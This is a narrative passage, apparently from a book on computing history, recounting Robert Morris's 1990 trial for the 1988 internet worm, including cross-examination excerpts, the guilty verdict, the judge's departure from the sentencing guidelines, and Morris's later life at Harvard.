Though Robert did not have to take the stand, the defense put him on anyway. They had little to lose. The prosecution had clearly established that Robert intentionally engaged in unauthorized access of government computers, preventing their use and causing at least $1,000 in damage. The only option was for Robert to admit to the jury that he intentionally released the worm but to deny that he intended to cause any damage. Robert’s pale complexion, thin frame, hangdog posture, ill-fitting suit, and utter lack of guile might sway the jury to show him mercy.
The plan failed. John Markoff, who attended the trial for The New York Times, described Robert as “slightly aloof, less endearing than he might have been.” His earnestness was his undoing. Rather than presenting as a contrite young man, Robert came off as a know-it-all. “So intent was he on explaining the technical details that, rather than steal the jurors’ hearts, he seemed slightly superior.”
Mark Rasch’s brutal cross-examination of Robert did not help. It constituted a master class for why defendants rarely testify at their own trials.
Q. Now, that worm, the one you finally ended up releasing, that was designed to break into many machines, right?
A. Yes, it was.
Q. It was designed to get into machines regardless of whether or not you personally had an account in any of those machines, right?
A. Right.
Q. It was designed to look for gateways and to seek out gateways and try to use them to break into gateways; is that right?
A. Yes, it was designed to break into gateways.
Q. And it was in terms of the type of machines it would actually try to hit, as opposed to running on, it was pretty much indiscriminate of the types of the machines it would try to hit.
A. That is right, there is no way to tell what kind of computer this is, no way to tell what type of computer without actually, you know, accessing it in some way.
Rasch did not let up.
Q. And [the worm] had more than one method to try to break into different computers.
A. Yes.
Q. And it used them in sort of a progression order; is that right?
A. It did.
Q. It would try the easy ones first and the more difficult ones in terms of computer resources after that.
A. I am not sure that the order was particularly relevant.
Q. But it was designed first to try, not necessarily in this order, but it was designed to try to exploit Finger; is that right?
A. It was, yes.
Q. And the reason it was going to exploit the Finger is to break into a computer; is that right?
A: That is right, it wanted to copy itself into that computer.
By the end, Rasch had gotten the defendant to make his case for him—gotten Robert to literally incriminate himself.
Q. Mr. Morris, would it be fair to say when you released the worm on November 2, 1988, it was your intention that the worm break into computers, regardless of whether or not you had a computer account on those computers?
A. Yes, it was.
Q. And you knew at that time that at least some people would have to expend some time and some energy in getting rid of this, figuring out what it was doing, and getting rid of it as a result of your actions; is that right?
A. Yes, that would have been a reasonable conclusion.
Mr. Rasch: I have no further questions, Your Honor.
Closing arguments for the prosecution and defense were held on Friday, January 19, 1990, leading the judge to submit the case to the jury on Monday. Robert and his family waited out the long weekend in frigid Syracuse.
On Monday morning, Judge Munson instructed the jury on the charge they were to consider. As he had done before the trial, Munson rejected Guidoboni’s interpretation of the law. The prosecution merely had to show that Morris intended to release the worm, not that he intended to cause any damage.
With this ruling, Robert Morris’s fate was sealed. The jury began deliberation at 2:00 p.m. It returned at 9:30 p.m. with a unanimous verdict. Robert stood expressionless as the jury foreman pronounced him guilty of felonious computer fraud.
Robert did not comment on the verdict, but his father did: “Whether it was the wrong verdict or the right verdict, I can’t say. I can say it was a disappointing verdict.” Bob added, “It’s perfectly honest to say that there is not a fraudulent or dishonest bone in his body.”
Sentencing was set for March 9, 1990.
The Sentence
Had Robert Morris released his worm a year earlier, Judge Munson would have had complete discretion over the punishment to be imposed. Congress had authorized a jail sentence of up to five years for anyone who had violated Section (a)(5) of the CFAA. This sentence, however, was a maximum penalty, not a mandatory one. A judge could impose any sentence the judge deemed just, provided it did not exceed five years.
In the meantime, however, Congress had passed a new series of laws known as the Federal Sentencing Guidelines. Enacting the Federal Sentencing Guidelines was an attempt to curtail the discretion of judges in setting penalties—to turn judges into sentencing computers. Judges would be required to use the guidelines to impose mandatory sentences as determined by a sentencing grid.
The Federal Sentencing Guidelines calculated penalties based on the kind of crime committed, the severity of the offense, and the prior criminal history and acceptance of responsibility of the offender. The worse the crime, greater the harm, longer the criminal history, and less the remorse, the bigger the sentence.
The sentencing guidelines came into effect on November 1, 1987. Robert Morris released his worm on November 2, 1988. Judge Munson was, therefore, required to follow the sentencing guidelines. According to the guidelines, Robert Morris had to serve between fifteen and twenty-one months in federal prison—a harsh sentence for a first-time offender who had no malicious intent.
Code—both down and up—can be demanding. It provides instructions depending on the data in question. The worm followed its downcode, which led to constant reinfections and subsequent crashes. The Federal Sentencing Guidelines required judges to impose certain penalties if a crime was committed after November 1, 1987.
One main difference between downcode and upcode is formality. The central processing unit does not exercise discretion—it simply executes the instructions it is given. Legal code is significantly less formal. It contains terms such as mitigating circumstances and appropriate sentence that require moral discretion to apply. A central processing unit cannot execute instructions with such concepts. It is not built for moral reasoning.
Though the Federal Sentencing Guidelines were billed as a mandatory, formal scheme, Congress provided an escape clause. A judge could depart from the grid if there was “an aggravating or mitigating circumstance of a kind, or to a degree, not adequately taken into consideration by the Sentencing Commission.” Since Robert Morris Jr. was the first person ever to be convicted of the felony provision of the Computer Fraud and Abuse Act of 1986, there was no history on which to rely when subsuming hacking under fraud.
Judge Munson, therefore, used the escape clause. “Although in and of itself, this offense is an extremely serious offense, by placing it in the Fraud and Deceit guideline in this specific case, the total dollars lost overstates the seriousness of the offense.” Judge Munson did not, therefore, impose any jail sentence. Instead, Robert Morris was fined $10,000, required to serve four hundred hours of community service, and placed on probation for three years. Though the Morris family was tremendously relieved that Robert escaped prison, his mother, Anne, was defiant: “I still don’t feel that in any way, shape, or form my son is a felon.”
While the law did not care about Robert’s lack of intention to cause harm, the public seemed to. At sentencing, Judge Munson described the many letters calling for mercy. He complained that he could not walk outside the courthouse without getting advice on the case. Middle-aged women would even accost him at his country club to plead for leniency.
Most commentators thought the sentence fair, but Eugene Spafford did not think the sentence was harsh enough. Some prison time, he insisted, was appropriate. He called for a boycott of any company that employed Robert Morris.
Fortunately for Robert, no one heeded the call. He moved back to Cambridge and worked for a software company. He needed money not only for living expenses, but also for the $10,000 fine imposed by Judge Munson. His family demanded that he pay it himself. The fine, however, was nothing compared to the total cost to the Morris family. Legal fees came close to $150,000.
Robert did not seek readmission to Cornell, applying instead to Harvard, which accepted him. He stayed away from hacking and wrote a dissertation on congestion control in TCP networks. In the preface to his dissertation, he thanks his adviser, H. T. Kung, who “took me under his wing at a time when my prospects seemed dark.” He also acknowledged Paul: “Paul Graham, my particular friend, understands how to lead a worthwhile life; would that I had his insight.” Last, Robert thanked his parents: “Finally, my parents still love me.”